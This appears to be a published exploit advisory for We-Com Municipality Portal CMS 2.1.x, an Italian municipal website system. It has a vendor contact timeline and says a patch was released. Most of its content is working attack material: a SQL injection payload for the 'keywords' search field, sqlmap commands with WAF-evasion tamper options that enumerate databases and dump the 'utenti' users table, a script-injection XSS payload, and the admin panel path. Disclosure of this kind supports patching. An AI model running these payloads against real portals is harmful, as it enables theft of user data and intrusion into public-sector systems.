We-Com Municipality Portal CMS version 2.1.x suffers from cross site scripting and remote SQL injection vulnerabilities.
209dcb236d7dfafbaa3a0142dcd10de0
# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.1.x
# Tested on: 5.5.0-kali1-amd64
---------------------------------------------------------
Vendor contact timeline:
2020-05-05: Contacting vendor through [email protected]
2020-05-26: A Patch is published in the versions
2020-06-01: Release of security advisory
PoC 1:
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker will be able to perform an automated process to exploit the secruity of Italien Municipality portal CMS
Payload(s)
http://www.site.it/cerca/
POST Data: keywords='1'--
SQLMAP Payload(s):
sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables
sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti
PoC 2 :
XSS Vulnerability
Payload(s) :
http://www.site.com/cerca/
in the search bar:
'"<script>alert(1);</script>%
Admin panel:
www.site.it/admin/